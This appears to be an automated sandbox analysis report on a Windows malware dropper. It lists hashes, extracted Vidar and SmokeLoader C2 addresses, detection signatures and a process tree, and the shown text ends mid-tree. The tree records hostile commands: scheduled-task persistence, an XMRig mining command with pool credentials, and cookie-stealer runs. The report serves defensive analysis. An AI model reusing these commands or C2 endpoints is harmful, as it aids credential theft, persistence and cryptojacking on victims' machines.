Resubmissions

13-08-2021 10:16

210813-wpta271jdx 10

08-08-2021 23:00

210808-fgs5g9pxfs 10

07-08-2021 23:12

210807-g2jw1lmd4a 10

07-08-2021 16:10

210807-51nhct4kfx 10

06-08-2021 23:43

210806-gc2271nxwj 10

06-08-2021 06:00

210806-f443x39x8a 10

05-08-2021 17:08

210805-97y6banvvx 10

04-08-2021 17:25

210804-hkxx2ntr8x 10

04-08-2021 12:12

210804-rjbg4b4y7n 10

03-08-2021 17:12

210803-r2h7ytjwqj 10

Analysis

  • max time kernel
    216s
  • max time network
    1837s
  • platform
    windows7_x64
  • resource
    win7v20210410
  • submitted
    07-08-2021 23:12

General

  • Target

    8 (22).exe

  • Size

    3.0MB

  • MD5

    bb072cad921aa5ce8b97706ce01bc570

  • SHA1

    18bf034906c1341b7817e7361ad27a4425d820bd

  • SHA256

    817a50d00909383bbef41e6f4e61b527d55f0873bcf745b29dbba75f52fe2e97

  • SHA512

    d40e5f77d882ed29bd9de5a6848072e2f81cd02176955e2b1a4aedcdf4eb687d77bebe33cef0c7d702bc828181755f86e2564523d476adbb785f396a5ce1d474

Malware Config

Extracted

Family

vidar

Version

39.6

Botnet

933

C2

https://sslamlssa1.tumblr.com/

Attributes
  • profile_id

    933

Extracted

Family

smokeloader

Version

2020

C2

http://conceitosseg.com/upload/

http://integrasidata.com/upload/

http://ozentekstil.com/upload/

http://finbelportal.com/upload/

http://telanganadigital.com/upload/

rc4.i32
rc4.i32

Signatures

  • Modifies WinLogon for persistence 2 TTPs 3 IoCs
  • Modifies Windows Defender Real-time Protection settings 3 TTPs
  • Process spawned unexpected child process 5 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • SmokeLoader

    Modular backdoor trojan in use since 2014.

  • Socelars

    Socelars is an infostealer targeting browser cookies and credit card credentials.

  • Suspicious use of NtCreateUserProcessOtherParentProcess 2 IoCs
  • Vidar

    Vidar is an infostealer based on Arkei stealer.

  • suricata: ET MALWARE GCleaner Downloader Activity M1

    suricata: ET MALWARE GCleaner Downloader Activity M1

  • suricata: ET MALWARE Generic Password Stealer User Agent Detected (RookIE)

    suricata: ET MALWARE Generic Password Stealer User Agent Detected (RookIE)

  • suricata: ET MALWARE Observed Elysium Stealer Variant CnC Domain (all-brain-company .xyz in TLS SNI)

    suricata: ET MALWARE Observed Elysium Stealer Variant CnC Domain (all-brain-company .xyz in TLS SNI)

  • suricata: ET MALWARE Possible Dridex Download URI Struct with no referer

    suricata: ET MALWARE Possible Dridex Download URI Struct with no referer

  • suricata: ET MALWARE Potential Dridex.Maldoc Minimal Executable Request

    suricata: ET MALWARE Potential Dridex.Maldoc Minimal Executable Request

  • suricata: ET MALWARE Sharik/Smoke CnC Beacon 11

    suricata: ET MALWARE Sharik/Smoke CnC Beacon 11

  • suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile

    suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile

  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
  • Vidar Stealer 2 IoCs
  • XMRig Miner Payload 1 IoCs
  • ASPack v2.12-2.42 17 IoCs

    Detects executables packed with ASPack v2.12-2.42

  • Downloads MZ/PE file
  • Executes dropped EXE 58 IoCs
  • Checks BIOS information in registry 2 TTPs 6 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Loads dropped DLL 64 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Themida packer 1 IoCs

    Detects Themida, an advanced Windows software protection system.

  • Accesses 2FA software files, possible credential harvesting 2 TTPs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 8 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 3 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 8 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Program crash 8 IoCs
  • Drops file in System32 directory 16 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 3 IoCs
  • Suspicious use of SetThreadContext 4 IoCs
  • Drops file in Program Files directory 5 IoCs
  • Drops file in Windows directory 4 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Checks SCSI registry key(s) 3 TTPs 6 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 8 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 6 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Delays execution with timeout.exe 1 IoCs
  • Kills process with taskkill 5 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies registry class 20 IoCs
  • Modifies system certificate store 2 TTPs 19 IoCs
  • Runs ping.exe 1 TTPs 1 IoCs
  • Script User-Agent 4 IoCs

    Uses user-agent string associated with script host/environment.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: MapViewOfSection 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 5 IoCs
  • Suspicious use of SendNotifyMessage 2 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Windows\system32\services.exe
    C:\Windows\system32\services.exe
    1⤵
      PID:464
      • C:\Windows\system32\svchost.exe
        C:\Windows\system32\svchost.exe -k netsvcs
        2⤵
        • Suspicious use of NtCreateUserProcessOtherParentProcess
        • Drops file in System32 directory
        • Suspicious use of SetThreadContext
        • Modifies registry class
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:892
        • C:\Windows\system32\taskeng.exe
          taskeng.exe {E5A008EB-ED15-46C5-8136-C772A0926FF8} S-1-5-21-2513283230-931923277-594887482-1000:MRBKYMNO\Admin:Interactive:[1]
          3⤵
            PID:3480
            • C:\Users\Admin\AppData\Roaming\wighjwd
              C:\Users\Admin\AppData\Roaming\wighjwd
              4⤵
                PID:1104
                • C:\Users\Admin\AppData\Roaming\wighjwd
                  C:\Users\Admin\AppData\Roaming\wighjwd
                  5⤵
                    PID:1264
                • C:\Users\Admin\AppData\Roaming\highjwd
                  C:\Users\Admin\AppData\Roaming\highjwd
                  4⤵
                    PID:2584
                • C:\Windows\system32\taskeng.exe
                  taskeng.exe {7799E5F8-A31E-4E93-AAB5-88221542D64D} S-1-5-18:NT AUTHORITY\System:Service:
                  3⤵
                    PID:2316
                    • C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe
                      "C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe" -v 115 -t 8080
                      4⤵
                        PID:1648
                      • C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe
                        "C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe" -v 114 -t 8080
                        4⤵
                          PID:752
                        • C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe
                          "C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe" -v 113 -t 8080
                          4⤵
                            PID:3116
                          • C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe
                            "C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe" -v 112 -t 8080
                            4⤵
                              PID:2364
                            • C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe
                              "C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe" -v 111 -t 8080
                              4⤵
                                PID:2380
                              • C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe
                                "C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe" -v 110 -t 8080
                                4⤵
                                  PID:4260
                              • C:\Windows\system32\taskeng.exe
                                taskeng.exe {CDE27DCF-DF36-45F5-8920-E4A89495A033} S-1-5-21-2513283230-931923277-594887482-1000:MRBKYMNO\Admin:Interactive:[1]
                                3⤵
                                  PID:3936
                                  • C:\Users\Admin\AppData\Roaming\highjwd
                                    C:\Users\Admin\AppData\Roaming\highjwd
                                    4⤵
                                      PID:5944
                                    • C:\Users\Admin\AppData\Roaming\wighjwd
                                      C:\Users\Admin\AppData\Roaming\wighjwd
                                      4⤵
                                        PID:5956
                                        • C:\Users\Admin\AppData\Roaming\wighjwd
                                          C:\Users\Admin\AppData\Roaming\wighjwd
                                          5⤵
                                            PID:6776
                                        • C:\Users\Admin\AppData\Roaming\wighjwd
                                          C:\Users\Admin\AppData\Roaming\wighjwd
                                          4⤵
                                            PID:9000
                                            • C:\Users\Admin\AppData\Roaming\wighjwd
                                              C:\Users\Admin\AppData\Roaming\wighjwd
                                              5⤵
                                                PID:8748
                                        • C:\Windows\system32\svchost.exe
                                          C:\Windows\system32\svchost.exe -k SystemNetworkService
                                          2⤵
                                          • Checks processor information in registry
                                          • Modifies data under HKEY_USERS
                                          • Modifies registry class
                                          PID:932
                                        • C:\Windows\system32\svchost.exe
                                          C:\Windows\system32\svchost.exe -k SystemNetworkService
                                          2⤵
                                          • Drops file in System32 directory
                                          • Checks processor information in registry
                                          • Modifies data under HKEY_USERS
                                          • Modifies registry class
                                          PID:2752
                                        • C:\Windows\system32\msiexec.exe
                                          C:\Windows\system32\msiexec.exe /V
                                          2⤵
                                            PID:2616
                                            • C:\Windows\syswow64\MsiExec.exe
                                              C:\Windows\syswow64\MsiExec.exe -Embedding AD24F88E05712247324EDC56768551CF C
                                              3⤵
                                                PID:1364
                                              • C:\Windows\syswow64\MsiExec.exe
                                                C:\Windows\syswow64\MsiExec.exe -Embedding 9138164D29B6853804572B52A399A532
                                                3⤵
                                                  PID:1496
                                                  • C:\Windows\SysWOW64\taskkill.exe
                                                    "C:\Windows\SysWOW64\taskkill.exe" /im AdvancedWindowsManager* /f
                                                    4⤵
                                                    • Kills process with taskkill
                                                    PID:3892
                                                • C:\Windows\syswow64\MsiExec.exe
                                                  C:\Windows\syswow64\MsiExec.exe -Embedding 358651905CADD00FB2C149D0C60E0E46 M Global\MSI0000
                                                  3⤵
                                                    PID:2716
                                              • C:\Users\Admin\AppData\Local\Temp\8 (22).exe
                                                "C:\Users\Admin\AppData\Local\Temp\8 (22).exe"
                                                1⤵
                                                • Loads dropped DLL
                                                • Suspicious use of WriteProcessMemory
                                                PID:1656
                                                • C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
                                                  "C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"
                                                  2⤵
                                                  • Executes dropped EXE
                                                  • Loads dropped DLL
                                                  • Suspicious use of WriteProcessMemory
                                                  PID:1200
                                                  • C:\Users\Admin\AppData\Local\Temp\7zS0B4DC9B4\setup_install.exe
                                                    "C:\Users\Admin\AppData\Local\Temp\7zS0B4DC9B4\setup_install.exe"
                                                    3⤵
                                                    • Executes dropped EXE
                                                    • Loads dropped DLL
                                                    • Suspicious use of WriteProcessMemory
                                                    PID:1892
                                                    • C:\Windows\SysWOW64\cmd.exe
                                                      C:\Windows\system32\cmd.exe /c sonia_1.exe
                                                      4⤵
                                                      • Loads dropped DLL
                                                      PID:1628
                                                      • C:\Users\Admin\AppData\Local\Temp\7zS0B4DC9B4\sonia_1.exe
                                                        sonia_1.exe
                                                        5⤵
                                                        • Executes dropped EXE
                                                        • Loads dropped DLL
                                                        PID:1904
                                                    • C:\Windows\SysWOW64\cmd.exe
                                                      C:\Windows\system32\cmd.exe /c sonia_3.exe
                                                      4⤵
                                                      • Loads dropped DLL
                                                      PID:1532
                                                      • C:\Users\Admin\AppData\Local\Temp\7zS0B4DC9B4\sonia_3.exe
                                                        sonia_3.exe
                                                        5⤵
                                                        • Executes dropped EXE
                                                        • Loads dropped DLL
                                                        • Modifies system certificate store
                                                        PID:288
                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 288 -s 944
                                                          6⤵
                                                          • Loads dropped DLL
                                                          • Program crash
                                                          • Suspicious behavior: EnumeratesProcesses
                                                          • Suspicious use of AdjustPrivilegeToken
                                                          PID:2168
                                                    • C:\Windows\SysWOW64\cmd.exe
                                                      C:\Windows\system32\cmd.exe /c sonia_6.exe
                                                      4⤵
                                                      • Loads dropped DLL
                                                      PID:680
                                                      • C:\Users\Admin\AppData\Local\Temp\7zS0B4DC9B4\sonia_6.exe
                                                        sonia_6.exe
                                                        5⤵
                                                        • Executes dropped EXE
                                                        • Loads dropped DLL
                                                        • Adds Run key to start application
                                                        PID:396
                                                        • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                          C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                          6⤵
                                                          • Executes dropped EXE
                                                          • Loads dropped DLL
                                                          PID:536
                                                        • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                          C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                          6⤵
                                                            PID:2832
                                                          • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                            C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                            6⤵
                                                              PID:3796
                                                            • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                              C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                              6⤵
                                                                PID:8480
                                                          • C:\Windows\SysWOW64\cmd.exe
                                                            C:\Windows\system32\cmd.exe /c sonia_7.exe
                                                            4⤵
                                                              PID:1644
                                                            • C:\Windows\SysWOW64\cmd.exe
                                                              C:\Windows\system32\cmd.exe /c sonia_5.exe
                                                              4⤵
                                                              • Loads dropped DLL
                                                              PID:1584
                                                            • C:\Windows\SysWOW64\cmd.exe
                                                              C:\Windows\system32\cmd.exe /c sonia_4.exe
                                                              4⤵
                                                              • Loads dropped DLL
                                                              PID:1636
                                                            • C:\Windows\SysWOW64\cmd.exe
                                                              C:\Windows\system32\cmd.exe /c sonia_2.exe
                                                              4⤵
                                                              • Loads dropped DLL
                                                              • Suspicious use of WriteProcessMemory
                                                              PID:1512
                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 1892 -s 412
                                                              4⤵
                                                              • Loads dropped DLL
                                                              • Program crash
                                                              • Suspicious behavior: EnumeratesProcesses
                                                              • Suspicious use of AdjustPrivilegeToken
                                                              PID:1780
                                                      • C:\Users\Admin\AppData\Local\Temp\7zS0B4DC9B4\sonia_1.exe
                                                        "C:\Users\Admin\AppData\Local\Temp\7zS0B4DC9B4\sonia_1.exe" -a
                                                        1⤵
                                                        • Executes dropped EXE
                                                        • Loads dropped DLL
                                                        PID:800
                                                      • C:\Users\Admin\AppData\Local\Temp\7zS0B4DC9B4\sonia_5.exe
                                                        sonia_5.exe
                                                        1⤵
                                                        • Executes dropped EXE
                                                        • Checks computer location settings
                                                        • Loads dropped DLL
                                                        • Modifies system certificate store
                                                        PID:1264
                                                        • C:\Users\Admin\Documents\axAx0lXTZCo8XJEKIozBTIvB.exe
                                                          "C:\Users\Admin\Documents\axAx0lXTZCo8XJEKIozBTIvB.exe"
                                                          2⤵
                                                          • Executes dropped EXE
                                                          PID:2280
                                                          • C:\Users\Admin\AppData\Local\Temp\e2a53sgt.5iw.exe
                                                            "C:\Users\Admin\AppData\Local\Temp\e2a53sgt.5iw.exe"
                                                            3⤵
                                                            • Executes dropped EXE
                                                            PID:2528
                                                            • C:\Users\Admin\AppData\Roaming\HashModule.exe
                                                              "C:\Users\Admin\AppData\Roaming\HashModule.exe"
                                                              4⤵
                                                              • Executes dropped EXE
                                                              PID:2872
                                                              • C:\Windows\System32\cmd.exe
                                                                "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "Internalprosecc" /tr '"C:\Users\Admin\AppData\Roaming\Internalprosecc.exe"' & exit
                                                                5⤵
                                                                  PID:2268
                                                                  • C:\Windows\system32\schtasks.exe
                                                                    schtasks /create /f /sc onlogon /rl highest /tn "Internalprosecc" /tr '"C:\Users\Admin\AppData\Roaming\Internalprosecc.exe"'
                                                                    6⤵
                                                                    • Creates scheduled task(s)
                                                                    PID:3608
                                                                • C:\Users\Admin\AppData\Roaming\Internalprosecc.exe
                                                                  "C:\Users\Admin\AppData\Roaming\Internalprosecc.exe"
                                                                  5⤵
                                                                  • Executes dropped EXE
                                                                  • Suspicious use of SetThreadContext
                                                                  PID:3236
                                                                  • C:\Windows\System32\cmd.exe
                                                                    "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "Internalprosecc" /tr '"C:\Users\Admin\AppData\Roaming\Internalprosecc.exe"' & exit
                                                                    6⤵
                                                                      PID:3408
                                                                      • C:\Windows\system32\schtasks.exe
                                                                        schtasks /create /f /sc onlogon /rl highest /tn "Internalprosecc" /tr '"C:\Users\Admin\AppData\Roaming\Internalprosecc.exe"'
                                                                        7⤵
                                                                        • Creates scheduled task(s)
                                                                        PID:3816
                                                                    • C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
                                                                      "C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"
                                                                      6⤵
                                                                      • Executes dropped EXE
                                                                      PID:3520
                                                                    • C:\Windows\explorer.exe
                                                                      C:\Windows\explorer.exe --cinit-find-x -B --algo=rx/0 --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=mine.bmpool.org:6004 --user=6031730 --pass=nixwaree --cpu-max-threads-hint=40 --cinit-idle-wait=1 --cinit-idle-cpu=80 --cinit-stealth
                                                                      6⤵
                                                                        PID:3588
                                                                  • C:\Users\Admin\AppData\Roaming\Intilizate.exe
                                                                    "C:\Users\Admin\AppData\Roaming\Intilizate.exe"
                                                                    4⤵
                                                                    • Executes dropped EXE
                                                                    • Checks BIOS information in registry
                                                                    • Adds Run key to start application
                                                                    • Checks whether UAC is enabled
                                                                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                    PID:1232
                                                                  • C:\Users\Admin\AppData\Roaming\SystemPropertiesAdvance.exe
                                                                    "C:\Users\Admin\AppData\Roaming\SystemPropertiesAdvance.exe"
                                                                    4⤵
                                                                    • Modifies WinLogon for persistence
                                                                    • Executes dropped EXE
                                                                    • Adds Run key to start application
                                                                    • Drops file in Windows directory
                                                                    PID:2052
                                                                    • C:\Windows\System32\cmd.exe
                                                                      "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\noWMkYdilo.bat"
                                                                      5⤵
                                                                        PID:3456
                                                                        • C:\Windows\system32\chcp.com
                                                                          chcp 65001
                                                                          6⤵
                                                                            PID:3792
                                                                          • C:\Windows\system32\w32tm.exe
                                                                            w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                                                            6⤵
                                                                              PID:3968
                                                                            • C:\Documents and Settings\conhost.exe
                                                                              "C:\Documents and Settings\conhost.exe"
                                                                              6⤵
                                                                              • Executes dropped EXE
                                                                              PID:2592
                                                                        • C:\Users\Admin\AppData\Roaming\WindowsInternal.exe
                                                                          "C:\Users\Admin\AppData\Roaming\WindowsInternal.exe"
                                                                          4⤵
                                                                          • Executes dropped EXE
                                                                          PID:1292
                                                                          • C:\Windows\System32\cmd.exe
                                                                            "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "WindowsInternal" /tr '"C:\Users\Admin\AppData\Roaming\WindowsInternal.exe"' & exit
                                                                            5⤵
                                                                              PID:3132
                                                                              • C:\Windows\system32\schtasks.exe
                                                                                schtasks /create /f /sc onlogon /rl highest /tn "WindowsInternal" /tr '"C:\Users\Admin\AppData\Roaming\WindowsInternal.exe"'
                                                                                6⤵
                                                                                • Creates scheduled task(s)
                                                                                PID:3680
                                                                            • C:\Users\Admin\AppData\Roaming\Microsoft\Telemetry\sihost32.exe
                                                                              "C:\Users\Admin\AppData\Roaming\Microsoft\Telemetry\sihost32.exe"
                                                                              5⤵
                                                                              • Executes dropped EXE
                                                                              PID:3288
                                                                          • C:\Users\Admin\AppData\Roaming\WindscribeLauncher.exe
                                                                            "C:\Users\Admin\AppData\Roaming\WindscribeLauncher.exe"
                                                                            4⤵
                                                                            • Executes dropped EXE
                                                                            • Checks BIOS information in registry
                                                                            • Checks whether UAC is enabled
                                                                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                            • Checks processor information in registry
                                                                            PID:536
                                                                          • C:\Users\Admin\AppData\Roaming\AkrienPremium.exe
                                                                            "C:\Users\Admin\AppData\Roaming\AkrienPremium.exe"
                                                                            4⤵
                                                                            • Executes dropped EXE
                                                                            PID:2072
                                                                      • C:\Users\Admin\Documents\OmKDDsH1i3vEEyGcDZ3siKTA.exe
                                                                        "C:\Users\Admin\Documents\OmKDDsH1i3vEEyGcDZ3siKTA.exe"
                                                                        2⤵
                                                                        • Executes dropped EXE
                                                                        • Loads dropped DLL
                                                                        PID:2292
                                                                        • C:\Windows\SysWOW64\dllhost.exe
                                                                          "C:\Windows\System32\dllhost.exe"
                                                                          3⤵
                                                                            PID:2732
                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                            "C:\Windows\System32\cmd.exe" /c cmd < Continua.pptx
                                                                            3⤵
                                                                              PID:2880
                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                cmd
                                                                                4⤵
                                                                                  PID:2860
                                                                                  • C:\Windows\SysWOW64\findstr.exe
                                                                                    findstr /V /R "^hrVmJwToKxUzJbufzBCieeoCYvJHZAdLamrEFkwMUIyxRybgpVUzcLJlUzAjsjoltowlzBJiAQhzXOKSZcbrGWfHQSKjKOxHAVdJthUHjMSFbfhyIHhWOtDiSxxBRbbMcF$" Palpito.pptx
                                                                                    5⤵
                                                                                      PID:2264
                                                                                    • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Dir.exe.com
                                                                                      Dir.exe.com p
                                                                                      5⤵
                                                                                      • Executes dropped EXE
                                                                                      PID:2108
                                                                                      • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Dir.exe.com
                                                                                        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Dir.exe.com p
                                                                                        6⤵
                                                                                        • Executes dropped EXE
                                                                                        PID:2560
                                                                                        • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\RegAsm.exe
                                                                                          C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\RegAsm.exe
                                                                                          7⤵
                                                                                            PID:2644
                                                                                      • C:\Windows\SysWOW64\PING.EXE
                                                                                        ping localhost -n 30
                                                                                        5⤵
                                                                                        • Runs ping.exe
                                                                                        PID:2704
                                                                                • C:\Users\Admin\Documents\aEjabcwtbKKZ6ZHjgBdycHQQ.exe
                                                                                  "C:\Users\Admin\Documents\aEjabcwtbKKZ6ZHjgBdycHQQ.exe"
                                                                                  2⤵
                                                                                  • Executes dropped EXE
                                                                                  PID:2308
                                                                                • C:\Users\Admin\Documents\b6PzUdBPZjvYY6pwBpUeQfX8.exe
                                                                                  "C:\Users\Admin\Documents\b6PzUdBPZjvYY6pwBpUeQfX8.exe"
                                                                                  2⤵
                                                                                  • Executes dropped EXE
                                                                                  • Modifies system certificate store
                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                  PID:2336
                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                    cmd.exe /c taskkill /f /im chrome.exe
                                                                                    3⤵
                                                                                      PID:2944
                                                                                      • C:\Windows\SysWOW64\taskkill.exe
                                                                                        taskkill /f /im chrome.exe
                                                                                        4⤵
                                                                                        • Kills process with taskkill
                                                                                        PID:2856
                                                                                  • C:\Users\Admin\Documents\z4LfD9Hgl72iBgQepsdcNrwL.exe
                                                                                    "C:\Users\Admin\Documents\z4LfD9Hgl72iBgQepsdcNrwL.exe"
                                                                                    2⤵
                                                                                    • Executes dropped EXE
                                                                                    PID:2352
                                                                                  • C:\Users\Admin\Documents\coCObLoqT8aKWTUICFTsuwvO.exe
                                                                                    "C:\Users\Admin\Documents\coCObLoqT8aKWTUICFTsuwvO.exe"
                                                                                    2⤵
                                                                                    • Executes dropped EXE
                                                                                    • Modifies system certificate store
                                                                                    PID:2368
                                                                                    • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                      C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                      3⤵
                                                                                      • Executes dropped EXE
                                                                                      PID:2652
                                                                                    • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                      C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                      3⤵
                                                                                      • Executes dropped EXE
                                                                                      PID:1364
                                                                                    • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                      C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                      3⤵
                                                                                        PID:2316
                                                                                      • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                        3⤵
                                                                                          PID:7076
                                                                                      • C:\Users\Admin\Documents\qSiZjo6OKzOda9Y6oGidD2LN.exe
                                                                                        "C:\Users\Admin\Documents\qSiZjo6OKzOda9Y6oGidD2LN.exe"
                                                                                        2⤵
                                                                                        • Executes dropped EXE
                                                                                        PID:2388
                                                                                      • C:\Users\Admin\Documents\yx7Mc3vmbNVEp9wwiWVxd5Qz.exe
                                                                                        "C:\Users\Admin\Documents\yx7Mc3vmbNVEp9wwiWVxd5Qz.exe"
                                                                                        2⤵
                                                                                        • Executes dropped EXE
                                                                                        PID:2380
                                                                                        • C:\Users\Admin\Documents\yx7Mc3vmbNVEp9wwiWVxd5Qz.exe
                                                                                          "C:\Users\Admin\Documents\yx7Mc3vmbNVEp9wwiWVxd5Qz.exe"
                                                                                          3⤵
                                                                                            PID:2436
                                                                                        • C:\Users\Admin\Documents\tplVSbB304hrVDXDBZIroLgV.exe
                                                                                          "C:\Users\Admin\Documents\tplVSbB304hrVDXDBZIroLgV.exe"
                                                                                          2⤵
                                                                                          • Executes dropped EXE
                                                                                          PID:2500
                                                                                          • C:\Users\Admin\AppData\Roaming\7767881.exe
                                                                                            "C:\Users\Admin\AppData\Roaming\7767881.exe"
                                                                                            3⤵
                                                                                            • Executes dropped EXE
                                                                                            PID:2116
                                                                                            • C:\Windows\system32\WerFault.exe
                                                                                              C:\Windows\system32\WerFault.exe -u -p 2116 -s 1760
                                                                                              4⤵
                                                                                              • Program crash
                                                                                              PID:2932
                                                                                          • C:\Users\Admin\AppData\Roaming\5210488.exe
                                                                                            "C:\Users\Admin\AppData\Roaming\5210488.exe"
                                                                                            3⤵
                                                                                            • Executes dropped EXE
                                                                                            PID:2436
                                                                                        • C:\Users\Admin\Documents\WPlAhrgmdKza4aJ9SCaPVO9p.exe
                                                                                          "C:\Users\Admin\Documents\WPlAhrgmdKza4aJ9SCaPVO9p.exe"
                                                                                          2⤵
                                                                                          • Executes dropped EXE
                                                                                          PID:2492
                                                                                          • C:\Users\Admin\AppData\Roaming\2890836.exe
                                                                                            "C:\Users\Admin\AppData\Roaming\2890836.exe"
                                                                                            3⤵
                                                                                            • Executes dropped EXE
                                                                                            PID:1552
                                                                                            • C:\Windows\system32\WerFault.exe
                                                                                              C:\Windows\system32\WerFault.exe -u -p 1552 -s 1760
                                                                                              4⤵
                                                                                              • Program crash
                                                                                              PID:2940
                                                                                          • C:\Users\Admin\AppData\Roaming\5210488.exe
                                                                                            "C:\Users\Admin\AppData\Roaming\5210488.exe"
                                                                                            3⤵
                                                                                            • Executes dropped EXE
                                                                                            PID:2488
                                                                                        • C:\Users\Admin\Documents\K3EWWeEqKO6Jn_yEF_X4pfCo.exe
                                                                                          "C:\Users\Admin\Documents\K3EWWeEqKO6Jn_yEF_X4pfCo.exe"
                                                                                          2⤵
                                                                                          • Executes dropped EXE
                                                                                          • Checks SCSI registry key(s)
                                                                                          • Suspicious behavior: MapViewOfSection
                                                                                          PID:2480
                                                                                        • C:\Users\Admin\Documents\knBsnnt1K2bbtlihIKPbeg9X.exe
                                                                                          "C:\Users\Admin\Documents\knBsnnt1K2bbtlihIKPbeg9X.exe"
                                                                                          2⤵
                                                                                          • Executes dropped EXE
                                                                                          • Checks processor information in registry
                                                                                          PID:2468
                                                                                          • C:\Windows\SysWOW64\cmd.exe
